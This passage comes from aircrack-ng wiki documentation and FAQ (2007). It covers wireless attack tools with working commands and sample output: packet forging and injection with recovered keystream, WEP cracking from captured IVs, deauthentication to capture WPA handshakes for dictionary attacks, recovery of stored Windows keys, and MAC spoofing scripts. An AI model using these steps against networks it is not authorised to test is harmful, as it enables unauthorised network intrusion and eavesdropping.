-e : disables WEP encryption
-k <ip[:port]> : set Destination IP [Port]
-l <ip[:port]> : set Source IP [Port]
-t ttl : set Time To Live
-w <file> : write packet to this pcap file
Source options:
-r <file> : read packet from this raw file
-y <file> : read PRGA from this file

Modes:
arp : forge an ARP packet (-0)
udp : forge an UDP packet (-1)
icmp : forge an ICMP packet (-2)
custom : build a custom packet (-9)

Usage Example
Here is an example of how to generate an arp request packet.

First, obtain a xor file (PRGA) with either the aireplay-ng chopchop or fragmentation method.

Then use the following command:

packetforge-ng -0 -a 00:14:6C:7E:40:80 -h 00:0F:B5:AB:CB:9D -k 192.168.1.100 -l 192.168.1.1 -y fragment-

0124-161129.xor -w arp-request

Where:

-0 indicates you want a arp request packet generated

-a 00:14:6C:7E:40:80 is the Access Point MAC address
-h 00:0F:B5:AB:CB:9D is the source MAC address you wish to use
-k 192.168.1.100 is the destination IP. IE In an arp it is the Who has this IP
-l 192.168.1.1 is the source IP. IE In an arp it is the Tell this IP
-y fragment-0124-161129.xor
-w arp-packet

Assuming you are experimenting with your own access point, arp request packet generated above
can be decrypted with your own key. So to see that packet we just created can be decrypted:

Enter airdecap-ng -w <access point encryption key> arp-request

The results look like this:

Total number of packets read 1

Total number of WEP data packets 1
Total number of WPA data packets 0
Number of plaintext data packets 0
Number of decrypted WEP packets 1
Number of decrypted WPA packets 0

To view the packet that was just decrypted, enter tcpdump -n -vvv -e -s0 -r arp-request-dec

The results look like this:

reading from file arp-request-dec, link-type EN10MB (Ethernet)

18:09:27.743303 00:0f:b5:ab:cb:9d > Broadcast, ethertype ARP (0x0806), length 42: arp who-has
192.168.1.100 tell 192.168.1.1

Which is exactly what we expected. Now you can inject this arp request packet as follows aireplay-
ng -2 -r arp-request ath0.
The program will respond as follows:

Size: 68, FromDS: 0, ToDS: 1 (WEP)

BSSID = 00:14:6C:7E:40:80
Dest. MAC = FF:FF:FF:FF:FF:FF
Source MAC = 00:0F:B5:AB:CB:9D

0x0000: 0841 0201 0014 6c7e 4080 000f b5ab cb9d .A....l~@.......
0x0010: ffff ffff ffff 8001 6c48 0000 0999 881a ........lH......
0x0020: 49fc 21ff 781a dc42 2f96 8fcc 9430 144d I.!.x..B/....0.M
0x0030: 3ab2 cff5 d4d1 6743 8056 24ec 9192 c1e1 :.....gC.V$.....
0x0040: d64f b709 .O..

Use this packet ? y

Saving chosen packet in replay_src-0124-163529.cap

You should also start airodump-ng to capture replies.
End of file.

By entering y above, the packet you created with packetforge-ng is then injected.

Usage Tips
Most access points really dont care what IPs are used for the arp request. So as a result you can
use 255.255.255.255 for source and destination IPs.

So the packetforge-ng command becomes:

packetforge-ng -0 -a 00:14:6C:7E:40:80 -h 00:0F:B5:AB:CB:9D -k 192.168.1.100 -l 192.168.1.1 -y fragment-

0124-161129.xor -w arp-request

Usage Troubleshooting
A common mistake people make is to include either or both -j and -o flags and create invalid
packets. These flags adjust the FromDS and ToDS flages in the packet generated. Unless you are
doing something special and really know what you are doing, dont use them. In general, they are
not needed.

packetforge-ng.txt Last modified: 2007/01/27 20:49 by darkaudax

Airtun-ng

Description
Airtun-ng is a virtual tunnel interface creator. There are two basic functions:

Allow all encrypted traffic to be monitored for wireless Intrusion Detection System (wIDS)
purposes.
Inject arbitrary traffic into a network.

In order to perform wIDS data gathering, you must have the encryption key and the bssid for the
network you wish to monitor. Airtun-ng decrypts all the traffic for the specific network and passes it
to a traditional IDS system such as snort.
Traffic injection can be two bidirectional if you have the full encyption key. It is outgoing
unidirectional if you have the PRGA obtained via chopchop or fragmentation attacks. The prime
advantage of airtun-ng over the other injection tools in the aircrack-ng suite is that you may use
any tool subsequently to create, inject or sniff packets.

Airtun-ng only runs on linux platforms.

Usage
usage: airtun-ng <options> <replay interface>

-x nbpps : maximum number of packets per second (optional)

-a bssid : set Access Point MAC address (mandatory)
-i iface : capture packets from this interface (optional)
-y file : read PRGA from this file (optional / one of -y or -w must be defined)
-w wepkey : use this WEP-KEY to encrypt packets (optional / one of -y or -w must be
defined)
-t tods : send frames to AP (1) or to client (0) (optional / defaults to 0)

Scenarios

wIDS
The first scenario is wIDS. Start your wireless card in monitor mode then enter:

airtun-ng -a 00:14:6C:7E:40:80 -w 1234567890 ath0

Where:

-a 00:14:6C:7E:40:80 is the MAC address of the access point to be monitored

-w 1234567890 is the encryption key
ath0 is the interface currently running in monitor mode

The system responds:

created tap interface at0

WEP encryption specified. Sending and receiving frames through ath0.
FromDS bit set in all frames.

You notice above that it created the at0 interface. Switch to another console sesssion and you must
now bring this interface up in order to use it:

ifconfig at0 up

This interface (at0) will receive a copy of every wireless network packet. The packets will have been
decrypted with the key you have provided. At this point you may any tool to sniff and analyze the
traffic. For example, tcpdump or snort.

WEP injection
The next scenario is where you want to inject packets into the network. Do exactly the same steps
as in the first scenario except define a valid IP address for the network when you bring the at0
interface up:
 ifconfig at0 192.168.1.83 netmask 255.255.255.0 up

You can confirm this by entering ifconfig at0 and checking the output.

at0 Link encap:Ethernet HWaddr 36:CF:17:56:75:27

inet addr:192.168.1.83 Bcast:192.168.1.255 Mask:255.255.255.0
inet6 addr: fe80::34cf:17ff:fe56:7527/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:192 errors:0 dropped:0 overruns:0 frame:0
TX packets:6 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:500
RX bytes:25113 (24.5 KiB) TX bytes:516 (516.0 b)

At this point you can use any tool you want and send traffic via the at0 interface to wireless clients.
Please note by default the FromDS flag is set. Meaning packets are flagged as going to the wireless
clients. If you wish to communicate via the AP or wired clients, specify the option -t 1 when you
start airtun-ng.

IMPORTANT NOTE: The normal rules apply to injection here as well. For example, being associated
with the AP, having the wireless card MAC match the injected source, etc. You have to remember to
also set the at0 MAC address.

An interesting use of this scenario is that it allows you to use a WEP encrypted network with a driver
that supports injection, but no WEP encryption, as not all drivers support 256bit wep or 512bit WEP
keys or WPA (once it is implemented) and so on.

PRGA injection
The next scenario is where you want to inject packets into the network but do not have the full WEP
key. You only have the PRGA obtain via a chopchop or fragmentation attack. In this case you may
only inject packets outbound. There is no way to decrypt inbound packets since you do not have the
full WEP key.

Start your wireless card in monitor mode then enter:

airtun-ng -a 00:14:6C:7E:40:80 -y fragment-0124-153850.xor ath0

Notice that the PRGA files was specified via the -y option.

The system responds (notice it correctly states no reception):

created tap interface at0

WEP encryption by PRGA specified. No reception, only sending frames through ath0.
FromDS bit set in all frames.

From here you can define a valid IP address for the network when you bring the at0 interface up:

ifconfig at0 192.168.1.83 netmask 255.255.255.0 up

You can confirm this by entering ifconfig at0. Again, at this point you can use any tool you want
and send traffic via the at0 interface to wireless clients.

Connecting to Two Access Points

The next scenario is connecting to two wireless networks at the same time. This is done by simply
starting airtun-ng twice and specifying the appropriate bssid MAC for each. If the 2 APs are on the
same channel, then everything should be fine. If they dont share one channel, you can listen with
airodump-ng on both channels (not simultaneously, but switching between only the two channels).
Assuming the two APs you want to connect to are on on channels 1 and 11, enter airodump-ng -c
1,11 ath0.
So youll get two tunnel interfaces (at0 and at1), each pointing to another AP. if they dont use the
same private subnet range, then you can use them at the same time. IE You are connected to more
than one AP. In theory, you could do this for even more then two APs, but the quality of the link
would be even worse when hopping on 3 channels.

Copy packets from the optional interface

The next scenario is copying packets from the optional interface. The -i <wireless interface> is just
like the aireplay-ng -i parameter. It is used for specifying a source to read packets from, other than
the given injection interface (ath0 in the examples above). A typical use is to listen with a very
sensitive card on one interface and to inject with a high power adapter, which has a lower
sensitivity.

Usage Tips
This tool is extremely powerful and utilizes advanced concepts. Please make sure you have built
your knowledge and experience with the other tools in the aircrack-ng suite prior to using it.

Usage Troubleshooting
Windows platforms - I cant find the airtun-ng tool!. Answer: airtun-ng only runs on linux.

airtun-ng.txt Last modified: 2007/01/29 22:07 by mister_x

Tools

WZCook
It recovers WEP keys from XPs Wireless Zero Configuration utility. This is experimental software, so
it may or may not work depending on your Service Pack level.

WZCOOK can also display the PMK (Pairwise Master Key), a 256-bit value which is the result of the
passphrase hashed 8192 times together with the ESSID and the ESSID length. The passphrase itself
cant be recovered however, knowing the PMK is enough to connect to a WPA-protected wireless
network with wpa_supplicant (see the Windows README). Your wpa_supplicant.conf configuration
file should look like:

network={
ssid="my_essid"
pmk=5c9597f3c8245907ea71a89d[...]9d39d08e

If you dont use WZC service, but you use USR Utility, get this registry value and try it here:

HKey_Current_User/Software/ACXPROFILE/profilename/dot11WEPDefaultKey1

ivstools
This tool handle .ivs files. You can either merge or convert them.
Merge
Use merge option to merge multiple .ivs files. Example:

ivstools --merge dump1.ivs dump2.ivs dump3.ivs out.ivs

It will merge dump1.ivs, dump2.ivs and dump3.ivs into out.ivs. You can merge more than 2 files,
output file must be the last argument.

Note: aircrack-ng is able to open multiple files (pcap or ivs)

Convert
Use convert option to convert a pcap file (by default, they have .cap extension) to a .ivs file.
Example:

ivstools --convert out.cap out.ivs

It will save out.cap IVs to out.ivs

Note: Kismet produce pcap files (the extension is .dump), that can be converted

WARNING: pcap2ivs from aircrack, and aircrack-ng up to v0.2.1 have a bug which creates broken
captures. You should not use pcap2ivs from those versions. If you have a broken IVs file from using
the broken versions, then try using FixIvs to recover it.

tools.txt Last modified: 2007/02/15 22:55 by darkaudax

FAQ

What tutorials are available ?

The Tutorials page has many tutorials specific to the aircrack-ng suite. If your question is not
answered on this FAQ page, be sure to check out these other resources:

The Forum
User Documentation by platform (Linux, Windows)

The links page also generic wireless information and tutorials.

How do I crack a static WEP key ?

The basic idea is to capture as much encrypted traffic as possible using airodump-ng. Each WEP data
packet has an associated 3-byte Initialization Vector (IV): after a sufficient number of data packets
have been collected, run aircrack-ng on the resulting capture file. aircrack-ng will then perform a set
of statistical attacks developped by a talented hacker named KoreK.
What are the authentication modes for WEP ?
There are two authentication modes for WEP:

Open System Authentication: This is the default mode. All clients are accepted by the AP, and
the key is never checked meaning association is always granted. However if your key is
incorrect you wont be able to receive or send packets (because decryption will fail), so
DHCP, ping etc. will timeout.
Shared Key Authentication: The client has to encrypt a challenge before association is
granted by the AP. This mode is flawed and leads to keystream recovery, so its never
enabled by default.

The NetGear Wireless Basics Manual has a good description of WEP Wireless Security including
diagrams of the packet flows.

How do I know my WEP key is correct ?

Just because you seem to have successfully connected to the access point doesnt mean your WEP
key is correct! To check your WEP key, the best way is to decrypt a capture file with the airdecap-ng
program.

How many IVs are required to crack WEP ?

WEP cracking is not an exact science. The number of required IVs depends on the WEP key length,
and it also depends on your luck. Usually, 40-bit WEP (64 bit key) can be cracked with 300.000 IVs,
and 104-bit WEP (128 bit key) can be cracked with 1.000.000 IVs; if youre out of luck you may
need two million IVs, or more. Theres no way to know the WEP key length: this information is kept
hidden and never announced, either in management or data packets; as a consequence, airodump-
ng can not report the WEP key length. Thus, it is recommended to run aircrack-ng twice: when you
have 250.000 IVs, start aircrack-ng with -n 64 to crack 40-bit WEP. Then if the key isnt found,
restart aircrack-ng (without the -n option) to crack 104-bit WEP.

How can I know what is the key length ?

You cant know whats the key lenght, theres no information at all in wireless packets, thats why
you have to try differents lengths. Most of the time, its a 128 bit key.

Will WPA be cracked in the future ?

Its extremely unlikely that WPA will be cracked just like WEP was.

The major problem with WEP is that the shared key is appended to the IV; the result is directly used
to feed RC4. This overly simple construction is prone to a statistical attack, since the first ciphertext
bytes are strongly correlated with the shared key (see Andrew Roos paper). There are basically two
counter-measures against this attack:

1. Mix the IV and the shared key using a hash function or

2. Discard the first 256 bytes of RC4s output.

There has been some disinformation in the news about the flaws of TKIP:

For now, TKIP is reasonably secure but it is also living on borrowed time since it still relies on the
same RC4 algorithm that WEP relied on.
Actually, TKIP (WPA1) is not vulnerable: for each packet, the 48-bit IV is mixed with the 128-bit
pairwise temporal key to create a 104-bit RC4 key, so theres no statistical correlation at all.
Furthermore, WPA provides counter-measures against active attacks (traffic reinjection), includes a
stronger message integrity code (michael), and has a very robust authentication protocol (the 4-way
handshake). The only vulnerability so far is a dictionnary attack, which fails if the passphrase is
robust enough.

WPA2 (aka 802.11i) is exactly the same as WPA1, except that CCMP (AES in counter mode) is used
instead of RC4 and HMAC-SHA1 is used instead of HMAC-MD5 for the EAPOL MIC. Bottom line,
WPA2 is a bit better than WPA1, but neither are going to be cracked in the near future.

How can I crack a WPA-PSK network ?

You must sniff until a handshake takes place between a wireless client and the access point. To force
the client to reauthenticate, you can start a deauth attack with aireplay-ng. Also, a good dictionary
is required. FYI, its not possible to pre-compute large tables of Pairwise Master Keys like
rainbowcrack does, since the passphrase is salted with the ESSID.

Where can I find good wordlists ?

The easiest way is do an Internet search for word lists and dictionaries. Also check out web sites for
password cracking tools. Many times they have references to word lists. Here are a couple of sites:

http://ftp.se.kde.org/pub/security/tools/net/Openwall/wordlists/
ftp://ftp.ox.ac.uk/pub/wordlists/

How do I merge multiple capture files ?

You may use File Merge... in Wireshark or Ethereal.

From the command line you may use the mergecap program to merge .cap files (part of the
Wireshark/Ethereal package or the win32 distribution):

mergecap -w out.cap test1.cap test2.cap test3.cap

It will merge test1.cap, test2.cap and test3.cap into out.cap

You may use the ivstools program to merge .ivs files (part of aircrack-ng package)

Can I convert cap files to ivs files ?

You may use the ivstools program (part of aircrack-ng package)

Can I use Wireshark/Ethereal to capture 802.11

packets ?
Under Linux, simply setup the card in monitor mode with the airmon-ng script. Under Windows,
Wireshark can capture 802.11 packets using AirPcap. Except in very rare cases, Ethereal cannot
capture 802.11 packets under Windows.
Can Wireshark/Ethereal decode WEP or WPA data packets ?
Ethereal and Wireshark up to and including 0.99.4 can decrypt WEP. Go to Edit Preferences
Protocols IEEE 802.11, select 1 in the WEP key count and enter your WEP key below.

Wireshark 0.99.5 and above can decrypt WPA as well. Go to Edit Preferences Protocols IEEE
802.11, select Enable decryption, and fill in the key according to the instructions in the
preferences window. You can also select Decryption Keys... from the wireless toolbar if its
displayed.

What are the different wireless filter expressions ?

The Wireshark display filter reference lists wlan (general 802.11), wlan_mgmt (802.11
management), wlancap (AVS capture header), wlancertextn (802.11 certificate extensions), and
radiotap (radiotap header)

(Ethereal Wireless Filters from www.remote-exploit.org)

How do I decrypt a capture file ?

You may use the airdecap-ng program

How do I change my card's MAC address ?

Under linux, the following information applies.

One method is:

ifconfig ath0 down

ifconfig ath0 hw ether 00:11:22:33:44:55
ifconfig ath0 up

Be aware that the example above does not work with every driver.

The easier way is to use the macchanger package. The documentation and download is at:
http://www.alobbs.com/macchanger This link tends to be slow or not answer. You can do an
Internet search for macchanger or here are some alternate links:

http://mirrors.usc.edu/pub/gnu/macchanger/
http://ftp.gnu.org/gnu/macchanger/
http://ftp.azc.uam.mx/mirrors/gnu/macchanger/

Here are scripts which use the macchanger package and work well with madwifi-ng drivers:

Script 1 - Invoked with macc.sh XX:XX:XX:XX:XX:XX

#!/bin/sh
cardctl eject
cardctl insert
wlanconfig ath0 destroy
ifconfig wifi0 up
ifconfig wifi0 down
macchanger wifi0 -m $1
wlanconfig ath0 create wlandev wifi0 wlanmode monitor
Script 2

#!/bin/sh
# Change the following variables to match your requirements
FAKEMAC="00:14:6C:71:41:32"
IFACE="ath0"
WIFACE="wifi0"
#
# The interface is brought up and down twice otherwise
# it causes a system exception and the system freezes
#
ifconfig $IFACE down
wlanconfig $IFACE destroy
wlanconfig $IFACE create wlandev $WIFACE wlanmode monitor
ifconfig $IFACE up
ifconfig $IFACE down
macchanger $WIFACE -m $FAKEMAC
wlanconfig $IFACE destroy
wlanconfig $IFACE create wlandev $WIFACE wlanmode monitor
ifconfig $IFACE up
ifconfig $IFACE
iwconfig
echo " "
echo "The wireless card MAC has been set to $FAKEMAC"
echo " "

Under Windows, you may use:

macmakeup
Technitium MAC Address Changer
ChangeMacAddress (There is cost for this product)

Troubleshooting Tip: A normal MAC address looks like this: 00:09:5B:EC:EE:F2. The first half
(00:09:5B) of each MAC address is the manufactuer. The second half (EC:EE:F2) is unique to each
network card. Many access points will ignore invalid MAC addresses. So make sure to use a valid
wireless card manufacturer code when you make up MAC addresses. Otherwise your packets may be
ignored.

Is my card compatible with airodump-ng / aireplay-ng ?

First of all, search Google to find which chipset your card has. For example, if you have a Linksys
WPC54G search for wpc54g chipset linux.

Then check it in compatibility_drivers

Can I have multiple instance of aireplay-ng running at

the same time?
Yes, you can.

How to use spaces, double quote and single quote in AP

names?
You have to prefix those special characters whith a \.

What is the best transmit power?

see Various tips
What is the size of ARP packets ?
When captured through a wireless interface, 68 bytes is typical for arp packets originating from
wireless clients. 86 bytes is typical for arp requests from wired clients.

On Ethernet, ARP packets when received are typically 60 bytes long. When this is then relayed by a
wireless access point, they are 86 bytes. This is, of course, because of the wireless headers. If a
wireless client sends an ARP, they are typically 42 bytes long and they become 68 when relayed by
the AP.

How can I resolve MAC addresses to IP addresses ?

You can try netdiscover or ARP tools

What are the allowed rates ?

Modulation Allowed rates

DSSS / CCK 1M, 2M, 5.5M, 11M

OFDM (a/g) 6M, 9M, 12M, 24M, 36M, 48M, 54M

How do I recover my WEP/WPA key in windows ?

You have to use WZcook

How can I force loading of the orinoco driver instead of

Hostap or force Hostap/wlan-ng instead of orinoco ?
You have to edit pcmcia-cs configs. See /etc/pcmcia/config and related files in that directory.
Example (force HostAP instead of orinoco):

Edit /etc/pcmcia/config
Add a new device if doesnt already exist

device "hostap_cs"
class "network" module "hostap_cs"

Find your cards name. In my case a DWL-650. If you dont find it, find a card that has the
same pciid of yours (you can also add an entry in config.opts if you want to do it cleanly)
In bind, replace orinoco_cs by hostap_cs
Save changes and close the file
Unplug all pcmcia cards using cardctl eject
Restart pcmcia service

/etc/init.d/pcmcia restart

Replug your card, and voil

Why do I have wlan0 and wifi0 when hostAP is loaded?
From the hostAP readme:

Unlike most Linux network drivers, Host AP driver creates multiple

network devices. wifi0 (or wifi# if you have multiple cards) is the
master interface for the radio device. It uses IEEE 802.11 headers
and is used internally by the driver to process frames to and from
other interfaces. wlan0 is the default data interface. It is the
interface that is used in most configurations, e.g., it is configured
with an IP address and iwconfig commands can be used with it. When
using WDS, each link will create a new virtual device (wlan0wds0).

Aireplay-ng doesn't inject packets

Possible reason:

Your card cannot inject packets (see Install drivers)

Bad driver (try reinstalling them. BTW, upgrade them to the latest version)
Driver not patched (also see Install drivers). Pay attention, drivers given with your distro are
NOT patched.
Youre too far, the access point or the client cannot get your packets
Signal is too weak (dont forget that WiFi uses radio waves)
The client or the access point is protected

What is the frequency for each channel?

To determine the frequency that a channel uses (or vice versa), check out:
http://www.rflinx.com/help/calculations/#2.4ghz_wifi_channels then select the Wifi Channel
Selection and Channel Overlap tab.

How do I convert the HEX characters to ASCII?

Here are some conversion links. Remember to put % in front of each hex character when going from
hex to ascii.

http://centricle.com/tools/ascii-hex/
http://www.mikezilla.com/exp0012.html
http://www.vortex.prodigynet.co.uk/misc/ascii_conv.html

How do I learn more about WPA/WPA2?

See the links page.

Does the aircrack-ng suite support Airpcap adaptor?

See airpcap.
I can't seem to capture any IVs !
As a reminder, it doesnt work at all with ndiswrapper.

Possible reasons:

You are standing too far from the access point.

There is no traffic on the target wireless network.
There is some G traffic but youre capturing in B mode.
Something is wrong with your card (firmware problem ?)
By the way, beacons are just unencrypted announcement packets. Theyre totally
useless for WEP cracking.

I can't inject packets

As a reminder, you cant inject with a Centrino, Hermes, ACX1xx, Aironet, ZyDAS, Marvell or
Broadcom chipset because of firmware and/or driver limitations.
Note: You cant inject with OpenWrt devices (This news is an april fool, see post date)

If your chipset supports injection, you can try the following:

Be closer (but not too much, it will be explained later) to the Access Point.
Decrease the speed for injection and/or the bitrate with which your card is operating.
(iwconfig <interface> rate 1M)
Your driver may be not patched or not up to date. You should always take the latest CVS/SVN
revision if it exist (see Drivers).
See also previous question.

I have more than one million IVs, but aircrack-ng

doesn't find the key !
Possible reasons:

Out of luck: you must capture more IVs. Usually, 104-bit WEP can be cracked with about one
million IVs, but sometimes more IVs are needed.
If all votes seem equal, or if there are many negative votes, then the capture file is
corrupted, or the key is not static (EAP/802.1X in use ?).
A false positive prevented the key from being found. Try to disable each korek attack (-k 1 ..
17), raise the fudge factor (-f) or try the experimental bruteforce attacks (-x / -y).

I've been unable to crack this AP !

Well, it happens. Last thing you can try is asking the key to the network owner ;)

I have a Prism2 card, but airodump-ng / aireplay-ng

doesn't seem to work !
First step, make sure you arent using the orinoco driver. If the interface name is wlan0, then the
driver is HostAP or wlan-ng. However if the interface name is eth0 or eth1, then the driver is orinoco
and you must disable the driver (use cardctl ident to know you card identifier, then edit
/etc/pcmcia/config, replace orinoco_cs with hostap_cs and restart cardmgr).
Also, it can be a firmware problem. Old firmwares have trouble with test mode 0x0A (used by the
HostAP / wlan-ng injection patches), so make sure yours is up to date (see Prism2 flashing for
instructions). The recommended station firmware version is 1.7.4. If it doesnt work well (kismet or
airodump-ng stalls after capturing a couple of packets), try STA 1.5.6 instead (either s1010506.hex
for old Prism2 cards, or sf010506.hex for newer ones).

On a side note, test mode 0x0A is somewhat unstable with wlan-ng. If the card seems stuck, you
will have to reset it, or use HostAP instead. Injection is currently broken on Prism2 USB devices with
wlan-ng.

I have an Atheros card, and the madwifi patch crashes

the kernel / aireplay-ng keeps saying enhanced RTC
support isn't available
There are quite a few problems with some versions of the Linux 2.6 branch (especially before 2.6.11
was released) that will cause a kernel panic when injecting with madwifi. Also, on many 2.6 kernels
enhanced RTC support is just broken. Thus, is it highly recommended to use either Linux 2.6.11.x or
newer.

Airodump-ng freeze when I change injecting rate, what

can I do ?
You have 2 workarounds:

Change the rate before using airodump-ng

Restart airodump-ng

The PEEK driver does not recognize my card

Some cards are not recognized by the Windows drivers above, even though they have the correct
chipset. In this case, open the hardware manager, select your card, Update the driver, select
Install from a specific location, select Dont search, I will choose the driver to install, click Have
disk, set the path to where the driver has been unzipped, uncheck Show compatible hardware,
and finally choose the driver.

Why do I get Error: packet length < 30 bytes ?

It was due to the use of madwifi-ng with aircrack and aircrack-ng up to 0.2.1

Why do I have bad speeds when i'm too close to the

access point?
Problem: The wireless card behaves badly if the signal is too strong. If Im too close (1-2m) to the
access point, I get high quality signal but actual transmission rates drop (down to 5-11Mbps or
less). The net result is TCP throughput of about 600KB/s.

This is called antenna and receiver saturation. The signal coming in to the preamplifier is too strong
and clips the input of the amplifier, causing signal degradation. This is a normal phenomenon with
most 802.11 hardware.
Is it a driver problem or is it my network hardware?
Neither, really. Its a physics problem. The only solution is to either decrease transmission power,
use an antenna with a lower gain factor, or move the access point farther away from the station.
You should use wired ethernet when youre close to the access point. If you dont want or you dont
have a wire, you can also decrease output power of your Access point or your card.

How do I download and compile aircrack-ng?

See the downloads page.

The driver won't compile

This usually happens because the linux headers dont match your current running kernel. In this
situation, grab the kernel sources or just recompile a fresh kernel, install it and reboot. Then, try
again compiling the driver. See this HOWTO for more details about kernel compilation.

Why can't I compile airodump-ng and aireplay-ng on

BSD / Mac OS X / Other OS ?
Both airodump-ng and aireplay-ng sources are Linux-specific.

Why do I get ioctl(SIOCGIFINDEX) failed: No such

device ?
Double check that your device name is correct and that you havent forgotten a parameter on the
command line. When using linux-wlan-ng driver, be sure to enable the interface first with airmon-
ng.

Why when i use aircrack-ng over a .ivs file i get lots of

random BSSID ?
If the .ivs file was generated using pcap2ivs from aircrack (any version) or aircrack-ng (up to 0.2.1).
It is corrupted by a bug in those versions. You should upgrade to aircrack-ng 0.3 or more.

You can try to recover part of the information using FixIvs.

Why aircrack-ng stalls while reading a .ivs file and does

not start cracking ?
Your .ivs file may have been corrupted if you used pcap2ivs. Read previous point.
Why does airodump-ng stop capturing packets after a
few seconds ?
wpa_supplicant or a network manager may be running and try to get connected to an Access Point.
You should stop it before running airodump-ng.

Why does my computer locks up when injecting packets

? Is there a solution?
See http://tinyshell.be/aircrackng/forum/index.php?topic=901.0

Is VMware supported?
At this point, there is only sketchy unconfirmed information about the aircrack-ng suite running
under VMware. One thing about doing VMware, you cant use PCMCIA cards with fedora (and maybe
other distros) that is running inside of VMWare (at least last the last time the forums at remote-
exploit were reviewed). You should be able to make use of internal cards and some USB wireless
cards but you limited on your antenna choices at that point. Some people modify their USB cards to
allow for external antenna. If anyone has hands-on experience, please post the Forum so the
information may be shared with everyone.

What other tips do you have?

Various tips

faq.txt Last modified: 2007/02/16 01:08 by darkaudax